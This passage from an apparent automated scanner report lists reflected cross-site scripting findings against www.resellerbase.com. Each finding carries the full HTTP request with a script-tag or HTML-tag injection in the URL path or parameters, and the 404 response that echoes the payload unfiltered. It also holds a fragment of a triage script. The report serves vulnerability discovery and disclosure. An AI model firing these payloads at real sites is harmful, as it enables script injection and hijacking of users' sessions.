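            "outcome": outcome,
            "retest_with_script": retest,
            "retest_payload": retest_payload(payload) if retest else None,
        }
    return result


if __name__ == "__main__":
    for finding, row in triage().items():
        print(finding, row)
```

Send the retest payload in the same position that produced the Firm finding. A "raw" outcome with the script canary puts that finding on the same footing as the Certain ones; an "encoded" or "stripped" outcome points at a filter that covers only that position and should be understood before the issue is closed, since the surrounding path and parameter-name reflections remain unfiltered.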

2.2256. http://www.resellerbase.com/detail/32/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/32/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1fe02<script>alert(1)</script>509b7f2b62f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail1fe02<script>alert(1)</script>509b7f2b62f/32/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail1fe02<script>alert(1)</script>509b7f2b62f/32/ was not found on this server.</p>
...[SNIP]...

2.2257. http://www.resellerbase.com/detail/32/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/32/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bf77e<script>alert(1)</script>8de1a2f3665 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/32bf77e<script>alert(1)</script>8de1a2f3665/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/32bf77e<script>alert(1)</script>8de1a2f3665/ was not found on this server.</p>
...[SNIP]...

2.2258. http://www.resellerbase.com/detail/32/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/32/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 18141<script>alert(1)</script>e9d0b64ffa2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/32/?18141<script>alert(1)</script>e9d0b64ffa2=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/32/?18141<script>alert(1)</script>e9d0b64ffa2=1 was not found on this server.</p>
...[SNIP]...

2.2259. http://www.resellerbase.com/detail/32/6-chats-com.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/32/6-chats-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6fc2d<script>alert(1)</script>11a0c195b93 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail6fc2d<script>alert(1)</script>11a0c195b93/32/6-chats-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail6fc2d<script>alert(1)</script>11a0c195b93/32/6-chats-com.html was not found on this server.</p>
...[SNIP]...

2.2260. http://www.resellerbase.com/detail/32/6-chats-com.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/32/6-chats-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 10760<a>601b90ee5ea was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/3210760<a>601b90ee5ea/6-chats-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3210760<a>601b90ee5ea/6-chats-com.html was not found on this server.</p>
...[SNIP]...

2.2261. http://www.resellerbase.com/detail/32/6-chats-com.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/32/6-chats-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b25a3<script>alert(1)</script>b2ff034afce was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/32/b25a3<script>alert(1)</script>b2ff034afce HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/adult/media-chat/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/32/b25a3<script>alert(1)</script>b2ff034afce was not found on this server.</p>
...[SNIP]...

2.2262. http://www.resellerbase.com/detail/32/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/32/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8c968<script>alert(1)</script>5c26522f008672cf0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail8c968<script>alert(1)</script>5c26522f008672cf0/32/rating.php?id=32&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/32/6-chats-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail8c968<script>alert(1)</script>5c26522f008672cf0/32/rating.php?id=32&rating=5 was not found on this server.</p>
...[SNIP]...

2.2263. http://www.resellerbase.com/detail/32/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/32/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 62a11<script>alert(1)</script>4984e36ac47 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail62a11<script>alert(1)</script>4984e36ac47/32/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail62a11<script>alert(1)</script>4984e36ac47/32/rating.php was not found on this server.</p>
...[SNIP]...

2.2264. http://www.resellerbase.com/detail/32/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/32/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4bddc<script>alert(1)</script>77c44087ddd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/324bddc<script>alert(1)</script>77c44087ddd/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/324bddc<script>alert(1)</script>77c44087ddd/rating.php was not found on this server.</p>
...[SNIP]...

2.2265. http://www.resellerbase.com/detail/32/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/32/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 950b0<script>alert(1)</script>53dd827dd775d2d47 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/32950b0<script>alert(1)</script>53dd827dd775d2d47/rating.php?id=32&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/32/6-chats-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/32950b0<script>alert(1)</script>53dd827dd775d2d47/rating.php?id=32&rating=5 was not found on this server.</p>
...[SNIP]...

2.2266. http://www.resellerbase.com/detail/32/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/32/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e604a<script>alert(1)</script>b613f5fb582f4a3a2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/32/rating.phpe604a<script>alert(1)</script>b613f5fb582f4a3a2?id=32&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/32/6-chats-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:26:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/32/rating.phpe604a<script>alert(1)</script>b613f5fb582f4a3a2?id=32&rating=5 was not found on this server.</p>
...[SNIP]...

2.2267. http://www.resellerbase.com/detail/32/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/32/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c181e<script>alert(1)</script>c78235f0541 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/32/rating.phpc181e<script>alert(1)</script>c78235f0541 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:40:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/32/rating.phpc181e<script>alert(1)</script>c78235f0541 was not found on this server.</p>
...[SNIP]...

2.2268. http://www.resellerbase.com/detail/32/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/32/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2d27d<script>alert(1)</script>d87269ff71c366394 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/32/rating.php/2d27d<script>alert(1)</script>d87269ff71c366394?id=32&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/32/6-chats-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/32/rating.php/2d27d<script>alert(1)</script>d87269ff71c366394?id=32&rating=5 was not found on this server.</p>
...[SNIP]...

2.2269. http://www.resellerbase.com/detail/32/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/32/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b474d<script>alert(1)</script>6d847da1e36 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/32/rating.php?b474d<script>alert(1)</script>6d847da1e36=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:39:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/32/rating.php?b474d<script>alert(1)</script>6d847da1e36=1 was not found on this server.</p>
...[SNIP]...

2.2270. http://www.resellerbase.com/detail/32/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/32/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 80d5a<script>alert(1)</script>101a2bb6ce5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail80d5a<script>alert(1)</script>101a2bb6ce5/32/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/32/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail80d5a<script>alert(1)</script>101a2bb6ce5/32/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2271. http://www.resellerbase.com/detail/32/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/32/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2b907<script>alert(1)</script>2c0031509e1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/322b907<script>alert(1)</script>2c0031509e1/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/32/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/322b907<script>alert(1)</script>2c0031509e1/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2272. http://www.resellerbase.com/detail/32/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/32/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload fc3b4<script>alert(1)</script>7ca800e0545 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/32/search.phpfc3b4<script>alert(1)</script>7ca800e0545?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/32/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/32/search.phpfc3b4<script>alert(1)</script>7ca800e0545?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2273. http://www.resellerbase.com/detail/32/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/32/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 9e386<a>1988cf2ea40 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/32/search.php?keyword=search...&Submit3=Search9e386<a>1988cf2ea40&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/32/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/32/search.php?keyword=search...&Submit3=Search9e386<a>1988cf2ea40&opt=2 was not found on this server.</p>
...[SNIP]...

2.2274. http://www.resellerbase.com/detail/32/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/32/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 7663a<a>7c4c6b31675 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/32/search.php?keyword=search...7663a<a>7c4c6b31675&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/32/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

